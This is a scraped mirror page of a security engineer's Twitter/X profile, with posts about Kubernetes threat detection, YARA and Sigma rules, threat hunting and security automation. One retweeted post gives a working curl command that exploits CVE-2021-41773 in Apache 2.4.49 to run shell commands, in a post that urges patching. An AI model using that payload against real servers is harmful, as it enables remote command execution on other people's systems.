Olivia
Online
Alexander Bolshakov
@spacepatcher
Building SOC for fun and profit
Limassol, Cyprus
Joined November 2013
128 Following
106 Followers
349 Posts
This is my article about threat detection approaches in Kubernetes environments.
I hope some of the ideas, detections, or monitoring techniques will be useful for other SOC/Detection Engineering teams working with K8s
Topics covered:
• K8s threat detection
• Audit logs
• Falco
• SIEM detections
• Threat hunting approaches
https://t.co/vH56bYkz4Z
#Kubernetes #K8S #ThreatDetection #SOC #DetectionEngineering #CyberSecurity
Kicking off 2024🚀with a blog series on traditional & generative AI in cybersecurity🤖Uncover how each excels, their complementary roles, and why traditional AI remains vital for core detection🛡️This post lays the foundation for key concepts🤓Stay tuned!! https://t.co/LcF7B61cfI
New Microsoft Incident Response team guide shares best practices for security teams and leaders | Microsoft Security Blog #DFIR https://t.co/imykBOtDNl
Launching the interactive Automation Capability Matrix tool today!
https://t.co/uk0r9gnz0t
The matrix started a little over a year ago (https://t.co/SfYbFldlQq) and has been available on Notion since January (https://t.co/OQoi8QD48Z).
Since the initial release, I have used the matrix working with numerous organizations. It offers a solid foundation for beginners to understand what is possible with security automation. For more advanced programs, it serves as a source of inspiration for future implementations, a tool to gauge success, and a means to report outcomes.
Now, the matrix can be fully customized to fit your needs. This includes:
• Adding new categories and capabilities.
• Organizing according to your priorities.
• Tracking automation workflows that align with these capabilities.
• Export the configuration
• Dark & light mode
The best part? All of this configuration is stored locally in your browser for privacy. Additionally, the app is also available on GitHub for those who prefer to run it themselves or contribute.
https://t.co/blrNPhuzQh
Happy automating!
Who to follow
Sergey Soldatov
@SVSoldatov
A failed artist and musician, all life have been working in infosecurity. All tweets are mine.
theAtropos4n6
@theAtropos4n6
#DFIR Researcher/Examiner/Blogger | https://t.co/cUOKOIb0lE | Opinions expressed are my own | One thing I know for sure, that I do not know anything (Socrates)
kekeke
@MazahakaJay
Some days ago I and @DbThumb provided talk about Hunting for macOS attack techniques on @PHDays12. Slides are available now!
#ThreatHunting #ThreatDetection #DFIR #SOC #incidentresponse #PHDays12
https://t.co/8cofWwnc1c
My annual recap is out:
- The best posts and projects of 2022
- Some plans for 2023
- A bunch of great reads for the holiday season
Sharing is caring 👇
https://t.co/YfbNca43LC
We analyzed a massive set of 27510 malicious LNK samples from @virustotal➡️Turns out explorer.exe (with a whooping 87.2% prevalence) is the most abused lolbin, followed by powershell.exe (7.3%), wscript.exe (4.4%), and rundll32.exe (0.5%). More stats⬇️
https://t.co/2T8ZcxIEHp
We just released 1000+ yara rules and 200+ endpoint behavior rules https://t.co/33PMWZIlky
I reduced a flow of DNS events by a factor of 30 using @vectordotdev aggregation mechanism (transform Dedupe) with almost no loss of information! The performance is amazing. Small victories in the daily SOC routine :)
#GoogleWorkspace is capable of blocking ALL access from particular PC to corporate Google account without providing any information about the malware or the threat that caused blocking... Even for #GWS administrator.
Why so obscure?
https://t.co/dZXMhiX7cG
When I read this story by @troyhunt about how @Cloudflare and @Azure misfired to cause a huge bill I felt terrible. I reached out to @scottgu and proposed we split Troy's cost. Scott immediately agreed. Great to support our mutual customers! https://t.co/CPQUX73OaF
I've published the code for some of the scripts I use to fill #Splunk assets. Feel free to use.
https://t.co/rmxVWRLxzt
🚨 CYBER MONDAY DEALS! 🚨
We have two excellent deals on offer.
1/ Free IP WHOIS API access!
2/ A hugely discounted premium plan!
Full details are in this thread 👇🧵
📌Hunting for Persistence in #Linux (Part 1): Auditd, #Sysmon, #Osquery, and Webshells
➡️https://t.co/fPSilbwyrm
Author: @__pberba__ 🔥
#threathunting #blueteam #redteam #DFIR #Security
⏰ ⏰ Part 2 of my blog series to connect @virustotal @TimesketchProj and @sigma_hq: https://t.co/EWTJ9fLWZf. This time we take a Sigma rule and adjust the Timesketch config to make it work. Enjoy and share if you found it useful. ⏰ ⏰
Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
Patch urgently.
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the #opensource "httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now!
New fix checks for encoded path traversal characters e.g. /../.%2E/
https://t.co/1tLNc3LAul
Windows Services (Creation) Mind Map covering service creation and detection methods.
Link: https://t.co/CK1HFcUyC6
#Detection #BlueTeam #Windows #Services
New blog post: Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability https://t.co/UJbuvdMU1r
Last Seen Users on Sotwe
🔞 Bin
Seen from Turkey
علي الفحل العراقي
Heyman_101 
Seen from United States
RichAmbitions
Seen from Philippines
Mensclubs
Seen from Pakistan
U-U
Seen from Korea
🍍Swinger y Cuckold♠️ Latam 🔥2𝟬𝟬𝗸
Seen from United Kingdom
new femboy 🙂
Seen from Turkey
Ahmed890
Seen from Lebanon
𝕂𝕡𝕜 𝕊𝕨𝕒𝕥 ℂℙ𝕃 🇵🇹
Seen from Pakistan
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.3M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
87M followers
Taylor Swift
@taylorswift13
80.8M followers
Lady Gaga
@ladygaga
72.4M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
68.9M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.5M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.1M followers